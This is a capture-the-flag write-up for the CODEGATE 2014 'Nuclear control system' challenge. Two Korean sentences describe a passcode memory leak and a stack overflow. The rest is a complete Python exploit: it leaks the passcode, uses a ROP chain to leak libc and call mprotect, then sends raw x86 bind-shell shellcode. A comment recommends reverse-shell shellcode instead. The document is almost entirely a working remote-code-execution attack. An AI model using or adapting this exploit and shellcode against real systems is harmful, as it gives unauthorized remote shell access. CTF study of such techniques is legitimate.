CODEGATE2014 Nuclear control system write_up

1. target설정과정에서 널바이트를 없애는 값을 넣으면, 커맨트 입력과정에서 메모리 릭이 발생
2. 메모리 릭으로 얻어낸 passcode를 가지고 launch를 실행하면, start_routine에서 BOF 가능

 

 

 

 

 

 

 

from socket import *

from struct import *

from time import sleep

 

p = lambda x : pack("<L", x)

up = lambda x : unpack("<L",x)[0]

 

HOST = "192.168.220.128"

PORT = 1129

 

bss = 0x0804b088 #2088byte

pppr = 0x0804917d

fd = 4

recv_plt = 0x080488e0

send_plt = 0x08048900

send_got = 0x0804b07c

 

leak_size = 4

send_mprotect_offset = 0xd4ac0 #ubuntu 13.10

 

 

 

shellcode=("\x31\xc0"+       

            "\x50"+           

            "\x40"+           

            "\x89\xc3"+        

            "\x50"+           

            "\x40"+           

            "\x50"+           

            "\x89\xe1"+       

            "\xb0\x66"+        

            "\xcd\x80"+        

            "\x31\xd2"+      

            "\x52"+            

            "\x66\x68\x13\xd2"+ 

            "\x43"+           

            "\x66\x53"+        

            "\x89\xe1"+       

            "\x6a\x10"+        

            "\x51"+           

            "\x50"+            

            "\x89\xe1"+       

            "\xb0\x66"+        

            "\xcd\x80"+        

            "\x40"+            

            "\x89\x44\x24\x04"+    

            "\x43"+          

            "\x43"+            

            "\xb0\x66"+        

            "\xcd\x80"+       

            "\x83\xc4\x0c"+        

            "\x52"+            

            "\x52"+            

            "\x43"+            

            "\xb0\x66"+        

            "\xcd\x80"+        

            "\x93"+           

            "\x89\xd1"+       

            "\xb0\x3f"+       

            "\xcd\x80"+        

            "\x41"+            

            "\x80\xf9\x03"+        

            "\x75\xf6"+        

            "\x52"+            

            "\x68\x6e\x2f\x73\x68"+    

            "\x68\x2f\x2f\x62\x69"+    

            "\x89\xe3"+        

            "\x52"+            

            "\x53"+            

            "\x89\xe1"+        

            "\xb0\x0b"+       

            "\xcd\x80")

 

print "[*] exploit start"

 

 

s=socket()

s.connect((HOST,PORT))

 

s.recv(1024)

s.recv(1024)

s.send("target")

s.recv(1024)

s.send("191.1919/191.1919")

s.recv(1024)

s.recv(1024)

s.send("a"*512)

print "[+] get passcode"

passcode=s.recv(1024)[542:-1] #passcode

s.recv(1024)

s.send("launch")

s.recv(1024)

s.send(passcode)

s.recv(1024)

 

print "[+] get mprotect@libc"

payload = ""

payload += "a"*528

payload += p(send_plt)

payload += p(0)

payload += p(fd)

payload += p(send_got)

payload += p(4)

payload += p(0)

 

s.send(payload)

sleep(0.5)

s.recv(92)

send_libc=s.recv(4)

mprotect=up(send_libc)-send_mprotect_offset

s.close()

 

 

print "[+] reconnection"

s=socket()

s.connect((HOST,PORT))

s.recv(1024)

s.recv(1024)

s.send("launch")

s.recv(1024)

s.send(passcode)

s.recv(1024)

 

 

print "[+] make payload"

 

payload = ""

payload += "a"*528

payload += p(mprotect)

payload += p(pppr)

payload += p(0x0804b000)

payload += p(0x200)

payload += p(7)

payload += p(recv_plt)

payload += p(bss)

payload += p(fd)

payload += p(bss)

payload += p(len(shellcode))

payload += p(0)

 

print "[+] send payload"

s.send(payload)

 

 

s.recv(4096)

sleep(1)

print "[+] send shellcode"

s.send(shellcode)

 

#소켓이 닫히기 전에 쉘을 연결하지 않으면 brokenpipe발생.. 그러무로 bind_tcp 보다는 reverse_tcp로 해야할듯

while(1): 

    print s.recv(4096)

    sleep(1)

   

print "[+] well done."

 

 

s.close()